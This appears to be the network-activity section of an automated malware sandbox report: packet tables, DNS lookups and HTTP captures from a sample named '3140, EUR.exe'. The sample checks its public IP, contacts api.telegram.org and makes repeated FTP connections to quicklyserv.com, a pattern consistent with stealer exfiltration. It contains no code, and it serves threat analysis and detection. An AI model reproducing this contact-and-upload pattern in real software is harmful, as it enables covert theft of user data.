Sep 30, 2024 15:03:25.808449984 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:25.810029030 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:25.810054064 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:25.987421989 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:25.987540960 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:25.987725019 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:25.988173962 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:25.996622086 CEST	49760	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:25.997909069 CEST	49764	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:26.002291918 CEST	80	49760	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:26.002368927 CEST	49760	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:26.003432989 CEST	80	49764	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:26.003521919 CEST	49764	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:26.003593922 CEST	49764	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:26.008338928 CEST	80	49764	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:27.489059925 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:27.490556955 CEST	49765	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:27.490611076 CEST	443	49765	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:27.490714073 CEST	49765	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:27.490983963 CEST	49765	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:27.490998030 CEST	443	49765	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:27.540317059 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:27.971052885 CEST	443	49765	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:27.972723007 CEST	49765	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:27.972752094 CEST	443	49765	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.112409115 CEST	443	49765	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.112507105 CEST	443	49765	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.112565041 CEST	49765	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.127656937 CEST	49765	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.207456112 CEST	80	49764	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:28.217713118 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.217739105 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.217806101 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.218039989 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.218050957 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.236593008 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.242002010 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:28.242067099 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.246906042 CEST	49767	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.251919031 CEST	80	49767	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:28.251996040 CEST	49767	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.252671957 CEST	49767	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.257458925 CEST	80	49767	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:28.259073019 CEST	49764	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.673980951 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.675796032 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.675823927 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.824891090 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.824990034 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:28.825058937 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.825440884 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:28.839608908 CEST	49764	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.844806910 CEST	80	49764	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:28.844886065 CEST	49764	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:28.846940994 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:28.847014904 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:28.847105980 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:28.847486973 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:28.847522020 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.461760044 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.461855888 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:29.465687037 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:29.465739012 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.465970039 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.467633009 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:29.515408993 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.704580069 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.704647064 CEST	443	49768	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:29.704859972 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:29.709539890 CEST	49768	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:33.059257984 CEST	80	49767	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:33.060728073 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:33.060771942 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:33.060862064 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:33.061156034 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:33.061175108 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:33.102859020 CEST	49767	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:33.558065891 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:33.559977055 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:33.560007095 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:33.711546898 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:33.711639881 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:33.711704969 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:33.712739944 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:33.716943026 CEST	49767	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:33.718193054 CEST	49770	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:33.722225904 CEST	80	49767	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:33.722318888 CEST	49767	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:33.723247051 CEST	80	49770	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:33.723449945 CEST	49770	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:33.723587036 CEST	49770	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:33.728542089 CEST	80	49770	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:35.715447903 CEST	80	49770	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:35.717004061 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:35.717091084 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:35.717178106 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:35.717503071 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:35.717539072 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:35.759090900 CEST	49770	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:35.982006073 CEST	49738	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:36.186157942 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:36.189529896 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:36.189587116 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:36.277112961 CEST	49772	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:36.281913996 CEST	21	49772	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:36.281990051 CEST	49772	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:36.283337116 CEST	49772	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:36.288451910 CEST	21	49772	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:36.288505077 CEST	49772	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:36.336365938 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:36.336448908 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:36.336514950 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:36.336924076 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:36.340174913 CEST	49770	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:36.341339111 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:36.345518112 CEST	80	49770	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:36.345628023 CEST	49770	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:36.346400023 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:36.346472025 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:36.346575022 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:36.351578951 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:38.217669964 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:38.219554901 CEST	49774	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:38.219594002 CEST	443	49774	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:38.219666004 CEST	49774	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:38.220053911 CEST	49774	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:38.220069885 CEST	443	49774	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:38.259083986 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:38.677580118 CEST	443	49774	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:38.679126978 CEST	49774	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:38.679150105 CEST	443	49774	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:38.813716888 CEST	443	49774	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:38.813801050 CEST	443	49774	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:38.813860893 CEST	49774	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:38.814322948 CEST	49774	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:38.817261934 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:38.817959070 CEST	49775	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:38.822416067 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:38.822485924 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:38.823086977 CEST	80	49775	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:38.823149920 CEST	49775	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:38.824012995 CEST	49775	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:38.828932047 CEST	80	49775	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:39.961122990 CEST	80	49775	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:39.963042021 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:39.963089943 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:39.963193893 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:39.970565081 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:39.970585108 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:40.009097099 CEST	49775	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:40.462877035 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:40.511313915 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:40.525434971 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:40.525454044 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:40.638169050 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:40.638252974 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:40.638326883 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:40.674525976 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:40.766993046 CEST	49775	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:40.768040895 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:40.768075943 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:40.768151045 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:40.768599033 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:40.768614054 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:40.772281885 CEST	80	49775	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:40.772337914 CEST	49775	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:41.396680117 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:41.396747112 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:41.398380995 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:41.398387909 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:41.398618937 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:41.400043011 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:41.447402954 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:41.655468941 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:41.655527115 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 30, 2024 15:03:41.655616999 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:41.667532921 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 30, 2024 15:03:45.387307882 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:45.392707109 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:45.392812967 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:46.016311884 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.016669989 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:46.021475077 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.239696026 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.252085924 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:46.256874084 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.557590961 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.564357996 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:46.569477081 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.787847042 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:46.788162947 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:46.792934895 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.012161016 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.012475967 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:47.018241882 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.236392021 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.236560106 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:47.241447926 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.460988045 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.461606026 CEST	49779	53879	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:47.466430902 CEST	53879	49779	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.466519117 CEST	49779	53879	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:47.466555119 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:47.471391916 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:47.995374918 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:48.090451002 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.090974092 CEST	49779	53879	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.091099024 CEST	49779	53879	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.095794916 CEST	53879	49779	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.096182108 CEST	53879	49779	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.096390009 CEST	49779	53879	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.134258986 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.144645929 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.150458097 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.150571108 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.314404011 CEST	21	49778	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.368482113 CEST	49778	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.778403997 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.778809071 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:48.783732891 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.996948004 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:48.997148991 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:49.002075911 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.243757963 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.253325939 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:49.258197069 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.471131086 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.477092028 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:49.481987000 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.694860935 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.695204020 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:49.699986935 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.916961908 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:49.917089939 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:49.922842026 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.136060953 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.136626959 CEST	49781	52160	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.141398907 CEST	52160	49781	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.141504049 CEST	49781	52160	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.141524076 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.146423101 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.742501974 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.742798090 CEST	49781	52160	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.742958069 CEST	49781	52160	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.747652054 CEST	52160	49781	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.748130083 CEST	52160	49781	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:50.748188972 CEST	49781	52160	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.790507078 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:03:50.961141109 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:03:51.009118080 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:00.043103933 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:00.048094988 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:00.260845900 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:00.261306047 CEST	49783	54464	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:00.266557932 CEST	54464	49783	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:00.266652107 CEST	49783	54464	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:00.266684055 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:00.271516085 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:01.029295921 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:01.032809019 CEST	49783	54464	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:01.032835007 CEST	49783	54464	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:01.037620068 CEST	54464	49783	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:01.038196087 CEST	54464	49783	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:01.038254023 CEST	49783	54464	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:01.071666956 CEST	49780	21	192.168.2.4	45.143.99.52
Sep 30, 2024 15:04:01.251184940 CEST	21	49780	45.143.99.52	192.168.2.4
Sep 30, 2024 15:04:01.305995941 CEST	49780	21	192.168.2.4	45.143.99.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:03:03.369647980 CEST	59005	53	192.168.2.4	1.1.1.1
Sep 30, 2024 15:03:03.588587999 CEST	53	59005	1.1.1.1	192.168.2.4
Sep 30, 2024 15:03:05.990294933 CEST	52918	53	192.168.2.4	1.1.1.1
Sep 30, 2024 15:03:05.997092009 CEST	53	52918	1.1.1.1	192.168.2.4
Sep 30, 2024 15:03:28.839507103 CEST	60144	53	192.168.2.4	1.1.1.1
Sep 30, 2024 15:03:28.846379995 CEST	53	60144	1.1.1.1	192.168.2.4
Sep 30, 2024 15:03:36.177577972 CEST	63796	53	192.168.2.4	1.1.1.1
Sep 30, 2024 15:03:36.276360035 CEST	53	63796	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 15:03:03.369647980 CEST	192.168.2.4	1.1.1.1	0xe9e9	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:05.990294933 CEST	192.168.2.4	1.1.1.1	0xc94b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:28.839507103 CEST	192.168.2.4	1.1.1.1	0x58e4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:36.177577972 CEST	192.168.2.4	1.1.1.1	0xca1e	Standard query (0)	quicklyserv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 15:03:03.588587999 CEST	1.1.1.1	192.168.2.4	0xe9e9	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 15:03:03.588587999 CEST	1.1.1.1	192.168.2.4	0xe9e9	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:03.588587999 CEST	1.1.1.1	192.168.2.4	0xe9e9	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:03.588587999 CEST	1.1.1.1	192.168.2.4	0xe9e9	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:03.588587999 CEST	1.1.1.1	192.168.2.4	0xe9e9	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:03.588587999 CEST	1.1.1.1	192.168.2.4	0xe9e9	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:05.997092009 CEST	1.1.1.1	192.168.2.4	0xc94b	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:05.997092009 CEST	1.1.1.1	192.168.2.4	0xc94b	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:28.846379995 CEST	1.1.1.1	192.168.2.4	0x58e4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:03:36.276360035 CEST	1.1.1.1	192.168.2.4	0xca1e	No error (0)	quicklyserv.com		45.143.99.52	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:03.610894918 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:05.617753029 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 30, 2024 15:03:05.623363972 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:05.914757013 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
